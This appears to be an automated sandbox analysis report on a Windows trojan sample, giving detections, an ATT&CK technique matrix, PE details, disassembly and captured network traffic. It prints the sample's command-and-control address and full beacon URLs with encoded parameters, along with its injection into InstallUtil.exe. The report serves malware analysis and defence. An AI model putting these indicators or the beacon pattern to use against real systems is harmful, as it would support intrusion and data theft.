                  Source: Yara matchFile source: 00000003.00000002.254163988.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.253884261.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: a9rLzLY498.exe PID: 6684, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6752, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.a9rLzLY498.exe.1356a70.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.a9rLzLY498.exe.1320000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.254163988.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.253884261.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: a9rLzLY498.exe PID: 6684, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6752, type: MEMORYSTR
                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts141
                  Windows Management Instrumentation
                  Path Interception311
                  Process Injection
                  1
                  Masquerading
                  1
                  Input Capture
                  1
                  System Time Discovery
                  Remote Services1
                  Input Capture
                  Exfiltration Over Other Network Medium1
                  Encrypted Channel
                  Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                  Disable or Modify Tools
                  LSASS Memory151
                  Security Software Discovery
                  Remote Desktop Protocol11
                  Archive Collected Data
                  Exfiltration Over Bluetooth3
                  Ingress Tool Transfer
                  Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)141
                  Virtualization/Sandbox Evasion
                  Security Account Manager1
                  Process Discovery
                  SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
                  Non-Application Layer Protocol
                  Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)311
                  Process Injection
                  NTDS141
                  Virtualization/Sandbox Evasion
                  Distributed Component Object ModelInput CaptureScheduled Transfer112
                  Application Layer Protocol
                  SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
                  Deobfuscate/Decode Files or Information
                  LSA Secrets1
                  Application Window Discovery
                  SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common21
                  Obfuscated Files or Information
                  Cached Domain Credentials1
                  File and Directory Discovery
                  VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items11
                  Software Packing
                  DCSync55
                  System Information Discovery
                  Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  a9rLzLY498.exe100%AviraHEUR/AGEN.1317015
                  a9rLzLY498.exe66%ReversingLabsWin32.Trojan.RedLine
                  a9rLzLY498.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/@uR2QlRXY2lmcwlGdsVXbsx2bwdmbvxWZtF2Z0%VirustotalBrowse
                  http://85.192.63.13410%VirustotalBrowse
                  http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/gamelongpollmultiprivateCdn.php?H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB&70c651d584b78b83a0db5e7ef0d2f3ac=9dc484284b526be3162c17278d370399&993462349e93aed7bfda6755d4d2dbec=QO3MTZiJWNiR2NhJWYkFTM2kTOwcTZwMGOmRzM4UTO4EDM0cjM0M2Y&H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB100%Avira URL Cloudmalware
                  http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyn6%VirustotalBrowse
                  http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyn100%Avira URL Cloudmalware
                  http://85.192.63.134100%Avira URL Cloudmalware
                  http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/@uR2QlRXY2lmcwlGdsVXbsx2bwdmbvxWZtF2Z100%Avira URL Cloudmalware
                  No contacted domains info
                  NameMaliciousAntivirus DetectionReputation
                  http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/gamelongpollmultiprivateCdn.php?H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB&70c651d584b78b83a0db5e7ef0d2f3ac=9dc484284b526be3162c17278d370399&993462349e93aed7bfda6755d4d2dbec=QO3MTZiJWNiR2NhJWYkFTM2kTOwcTZwMGOmRzM4UTO4EDM0cjM0M2Y&H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhBtrue
                  • Avira URL Cloud: malware
                  unknown
                  http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/@uR2QlRXY2lmcwlGdsVXbsx2bwdmbvxWZtF2Ztrue
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://85.192.63.134InstallUtil.exe, 00000003.00000002.254163988.0000000002C3D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.254163988.0000000002C12000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.254163988.0000000002C33000.00000004.00000800.00020000.00000000.sdmptrue
                  • 10%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameInstallUtil.exe, 00000003.00000002.254163988.0000000002C12000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://85.192.63.134/voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asynInstallUtil.exe, 00000003.00000002.254163988.0000000002C12000.00000004.00000800.00020000.00000000.sdmptrue
                    • 6%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    85.192.63.134
                    unknownRussian Federation
                    47711LINEGROUP-ASRUtrue
                    Joe Sandbox Version:38.0.0 Beryl
                    Analysis ID:1311370
                    Start date and time:2023-09-20 09:46:13 +02:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 6m 34s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:26
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample file name:a9rLzLY498.exe
                    Original Sample Name:5a09955b26de8ecdfd90121d3e208825.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@6/2@0/1
                    EGA Information:
                    • Successful, ratio: 50%
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 99%
                    • Number of executed functions: 111
                    • Number of non-executed functions: 47
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): www.bing.com, kv601.prod.do.dsp.mp.microsoft.com, geover.prod.do.dsp.mp.microsoft.com, fs.microsoft.com, geo.prod.do.dsp.mp.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, arc.msn.com
                    • Execution Graph export aborted for target InstallUtil.exe, PID 6752 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    TimeTypeDescription
                    09:47:20API Interceptor3x Sleep call for process: InstallUtil.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    85.192.63.134MtgwNNkkgT.exeGet hashmaliciousDCRatBrowse
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      LINEGROUP-ASRUMtgwNNkkgT.exeGet hashmaliciousDCRatBrowse
                      • 85.192.63.134
                      file.exeGet hashmaliciousUnknownBrowse
                      • 85.192.63.194
                      xGSkelSjdu.exeGet hashmaliciousRaccoon Stealer v2Browse
                      • 85.192.63.15
                      ImBetter.exeGet hashmaliciousUnknownBrowse
                      • 85.192.63.32
                      B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dllGet hashmaliciousRaccoon Stealer v2Browse
                      • 85.192.63.204
                      B94872E1A7599AF25CAA25013FC0054E5AFFDA6CFAEF6.dllGet hashmaliciousRaccoon Stealer v2Browse
                      • 85.192.63.204
                      DxIQxeHMa9.exeGet hashmaliciousAmadey, Laplas ClipperBrowse
                      • 85.192.63.121
                      Tn4ashLbYc.exeGet hashmaliciousAuroraBrowse
                      • 85.192.63.77
                      BkazCbNYxo.exeGet hashmaliciousAurora, AgentTesla, Amadey, Eternity StealerBrowse
                      • 85.192.63.77
                      oOb5C7arAh.dllGet hashmaliciousAmadey, Raccoon Stealer v2, RedLineBrowse
                      • 85.192.63.204
                      c96cf2857a6044e9149ab0d55c3dfe280cefe8add4791.dllGet hashmaliciousAmadey, Raccoon Stealer v2, RedLineBrowse
                      • 85.192.63.121
                      59d84ed47893f3f3b3a3e121ffbcfa0b86bdb91431a7c.exeGet hashmaliciousAmadeyBrowse
                      • 85.192.63.121
                      evb.exeGet hashmaliciousUnknownBrowse
                      • 85.192.63.103
                      file.exeGet hashmaliciousRedLineBrowse
                      • 85.192.63.57
                      yW7mLzcc7I.exeGet hashmaliciousUnknownBrowse
                      • 85.192.63.240
                      zaebr2KFu1.exeGet hashmaliciousUnknownBrowse
                      • 85.192.63.240
                      6UehABuMnu.exeGet hashmaliciousUnknownBrowse
                      • 85.192.63.240
                      N3gA1d2efb.exeGet hashmaliciousEternity StealerBrowse
                      • 85.192.63.240
                      ZdxTUeilBE.exeGet hashmaliciousUnknownBrowse
                      • 85.192.63.240
                      41y5zVipKH.exeGet hashmaliciousUnknownBrowse
                      • 85.192.63.240
                      No context
                      No context
                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1298
                      Entropy (8bit):5.325943738887083
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KI2KDE4KhKYIqDcfJKhPKIE4oKzeEKoZAE4KzQKfJE4VE4G1qE4FsXD:MIHK5HKI2YHKhBUoPtHoBEhAHKz9fJHW
                      MD5:B22140F614C0DF020F2F2EF28263CBA8
                      SHA1:F9CB2646E6F4BE3834D8D702DB41386D082E266C
                      SHA-256:30A905A788AB1E157F9C265669503FDE317B8504689EC765F8FE83436FFA55BA
                      SHA-512:2871E73F72EF3D6F8BAAFAD58DD83C9074F3465A9F55658718D41E9BD5993D33260511364D58F6C628FE01B98E68C8423A0AB86EB1E435AC132D6AF0F06538F7
                      Malicious:false
                      Reputation:low
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\2bef38851483abae82f1172c1aaa604c\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\9d04ce1d8a3042f50b54c7f9ccdb4068\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8c730c7fbe608461407cf3be279cdeab\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2e14a1befe55e7d9ad2457ceb5267e36\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, Publ
                      Process:C:\Users\user\Desktop\a9rLzLY498.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):35
                      Entropy (8bit):3.8134616510875294
                      Encrypted:false
                      SSDEEP:3:liMGKXfuHu7v:liMGeuHyv
                      MD5:C27BE8FCA72C6433A97D94021F490CDD
                      SHA1:D596AAAE4100521E6C842EAD304C903DE908C3F4
                      SHA-256:A42BBD1C477873FAD13F6C97E0CD68164A5C5026ACDEC952DCC1E092E97A51F6
                      SHA-512:78D16ED2C7CEB43839061F373FB315F32DBED9D77DDC9DB37162D944A16B45E317EDD83726B32C431B1F05FFF9C0E8FFC8363BF5B56958EC08A773762273E957
                      Malicious:false
                      Reputation:low
                      Preview:Sorted vector: 1 2 3 4 5 6 7 8 9 ..
                      File type:PE32 executable (console) Intel 80386, for MS Windows
                      Entropy (8bit):5.671462678637105
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:a9rLzLY498.exe
                      File size:2'114'048 bytes
                      MD5:5a09955b26de8ecdfd90121d3e208825
                      SHA1:f9ba5c15dca18cbbcac885c3d31b54b4416ff06f
                      SHA256:9a813ede666b2e709555af5fd3da93ee77a30a1f615c2036e9161932482bf022
                      SHA512:043ead1331d96896638a7fb69dd6813c3d807255284cbb87b05e32e83c132e52ac95cdf84ced59af90230bb89c6637fa7f6232730588d93fc7bd39e51e929ba7
                      SSDEEP:24576:+af/AXatCkb39Dhd0FhOKx/sO/PPpcEbIYPxvYz3zkdpliAzT4t8NO5vH:PAXcCY3bdeOK1pHpcEUYWzodpFsiNWH
                      TLSH:BCA5124278E1C4B1E4B2123209E0DBBA1A7F79340BA59DEF17D01B6E8F217D1C67166B
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........._Z...Z...Z.......W...............L.......K.......O......._...Z...................[.......[...RichZ...........PE..L.....Sd...
                      Icon Hash:90cececece8e8eb0
                      Entrypoint:0x409cc2
                      Entrypoint Section:.text
                      Digitally signed:true
                      Imagebase:0x400000
                      Subsystem:windows cui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Time Stamp:0x6453F212 [Thu May 4 17:57:38 2023 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:6
                      OS Version Minor:0
                      File Version Major:6
                      File Version Minor:0
                      Subsystem Version Major:6
                      Subsystem Version Minor:0
                      Import Hash:f13181778fde385e01ef306b3e3c20ba
                      Signature Valid:
                      Signature Issuer:
                      Signature Validation Error:
                      Error Number:
                      Not Before, Not After
                        Subject Chain
                          Version:
                          Thumbprint MD5:
                          Thumbprint SHA-1:
                          Thumbprint SHA-256:
                          Serial:
                          Instruction
                          call 00007F60088E87CAh
                          jmp 00007F60088E7E69h
                          push ebp
                          mov ebp, esp
                          mov eax, dword ptr [ebp+08h]
                          push esi
                          mov ecx, dword ptr [eax+3Ch]
                          add ecx, eax
                          movzx eax, word ptr [ecx+14h]
                          lea edx, dword ptr [ecx+18h]
                          add edx, eax
                          movzx eax, word ptr [ecx+06h]
                          imul esi, eax, 28h
                          add esi, edx
                          cmp edx, esi
                          je 00007F60088E800Bh
                          mov ecx, dword ptr [ebp+0Ch]
                          cmp ecx, dword ptr [edx+0Ch]
                          jc 00007F60088E7FFCh
                          mov eax, dword ptr [edx+08h]
                          add eax, dword ptr [edx+0Ch]
                          cmp ecx, eax
                          jc 00007F60088E7FFEh
                          add edx, 28h
                          cmp edx, esi
                          jne 00007F60088E7FDCh
                          xor eax, eax
                          pop esi
                          pop ebp
                          ret
                          mov eax, edx
                          jmp 00007F60088E7FEBh
                          push esi
                          call 00007F60088E8AA4h
                          test eax, eax
                          je 00007F60088E8012h
                          mov eax, dword ptr fs:[00000018h]
                          mov esi, 0053A5D0h
                          mov edx, dword ptr [eax+04h]
                          jmp 00007F60088E7FF6h
                          cmp edx, eax
                          je 00007F60088E8002h
                          xor eax, eax
                          mov ecx, edx
                          lock cmpxchg dword ptr [esi], ecx
                          test eax, eax
                          jne 00007F60088E7FE2h
                          xor al, al
                          pop esi
                          ret
                          mov al, 01h
                          pop esi
                          ret
                          push ebp
                          mov ebp, esp
                          cmp dword ptr [ebp+08h], 00000000h
                          jne 00007F60088E7FF9h
                          mov byte ptr [0053A5D4h], 00000001h
                          call 00007F60088E82BAh
                          call 00007F60088EB037h
                          test al, al
                          jne 00007F60088E7FF6h
                          xor al, al
                          pop ebp
                          ret
                          call 00007F60088F4D78h
                          test al, al
                          jne 00007F60088E7FFCh
                          push 00000000h
                          call 00007F60088EB03Eh
                          pop ecx
                          jmp 00007F60088E7FDBh
                          mov al, 01h
                          pop ebp
                          ret
                          push ebp
                          mov ebp, esp
                          cmp byte ptr [0053A5D5h], 00000000h
                          je 00007F60088E7FF6h
                          mov al, 01h
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x356f80x3c.rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x4000x300
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x6000x100
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x13c0000x1e2c.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x338d00x0.rdata
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x338100x40.rdata
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x280000x13c.rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x26b800x26c00False0.5682585685483871data6.667171746059635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rdata0x280000xde200xe000False0.5119803292410714data5.488575071928691IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0x360000x1050f00x104400False0.9969699357588857DOS executable (block device driver \377\377\377\377N)7.998793152267472IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .reloc0x13c0000x1e2c0x2000False0.7174072265625data6.402635845254397IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          .Sakut0x13e0000xc8af00xc8c00False0.0010677731942714819OpenPGP Secret Key0.0008440436192122338IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          DLLImport
                          USER32.dllDdeQueryNextServer
                          KERNEL32.dllLoadLibraryExW, CreateFileW, FreeConsole, GetModuleHandleW, MultiByteToWideChar, GetStringTypeW, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, HeapSize, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, WriteConsoleW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetProcessHeap
                          TimestampSource PortDest PortSource IPDest IP
                          Sep 20, 2023 09:47:20.434411049 CEST4970680192.168.2.685.192.63.134
                          Sep 20, 2023 09:47:20.687223911 CEST804970685.192.63.134192.168.2.6
                          Sep 20, 2023 09:47:20.687344074 CEST4970680192.168.2.685.192.63.134
                          Sep 20, 2023 09:47:20.692095041 CEST4970680192.168.2.685.192.63.134
                          Sep 20, 2023 09:47:20.941962957 CEST804970685.192.63.134192.168.2.6
                          Sep 20, 2023 09:47:20.942027092 CEST804970685.192.63.134192.168.2.6
                          Sep 20, 2023 09:47:20.993397951 CEST4970680192.168.2.685.192.63.134
                          Sep 20, 2023 09:47:21.021341085 CEST4970680192.168.2.685.192.63.134
                          Sep 20, 2023 09:47:21.275055885 CEST804970685.192.63.134192.168.2.6
                          Sep 20, 2023 09:47:21.318645954 CEST4970680192.168.2.685.192.63.134
                          • 85.192.63.134
                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.2.64970685.192.63.13480C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampkBytes transferredDirectionData
                          Sep 20, 2023 09:47:20.692095041 CEST184OUTGET /voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/gamelongpollmultiprivateCdn.php?H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB&70c651d584b78b83a0db5e7ef0d2f3ac=9dc484284b526be3162c17278d370399&993462349e93aed7bfda6755d4d2dbec=QO3MTZiJWNiR2NhJWYkFTM2kTOwcTZwMGOmRzM4UTO4EDM0cjM0M2Y&H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB HTTP/1.1
                          Accept: */*
                          Content-Type: text/javascript
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                          Host: 85.192.63.134
                          Connection: Keep-Alive
                          Sep 20, 2023 09:47:20.942027092 CEST184INHTTP/1.1 404 Not Found
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Wed, 20 Sep 2023 07:47:20 GMT
                          Content-Type: text/html
                          Content-Length: 162
                          Connection: keep-alive
                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                          Sep 20, 2023 09:47:21.021341085 CEST185OUTGET /voiddbBetterGame6/apiasync/php/0externalimage2/Poll/Wordpress/_/4eternal03/asyncLine/central/downloadssecure4To/18LocalDatalife/linuxEternal/3FlowerProcessor5/1Longpoll/gamelongpollmultiprivateCdn.php?H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB&70c651d584b78b83a0db5e7ef0d2f3ac=9dc484284b526be3162c17278d370399&993462349e93aed7bfda6755d4d2dbec=QO3MTZiJWNiR2NhJWYkFTM2kTOwcTZwMGOmRzM4UTO4EDM0cjM0M2Y&H2EU00jrrq8rDSds6v954M6hZtknN1=fF0&n1IjYINcC0Co=LxSnoBC55h&GQ5e0ndlN6z0xLlxrt4rXFTcZiZ0E=asUOdINtmZXaaUW6fcDOULAzhB HTTP/1.1
                          Accept: */*
                          Content-Type: text/javascript
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                          Host: 85.192.63.134
                          Sep 20, 2023 09:47:21.275055885 CEST186INHTTP/1.1 404 Not Found
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Wed, 20 Sep 2023 07:47:21 GMT
                          Content-Type: text/html
                          Content-Length: 162
                          Connection: keep-alive
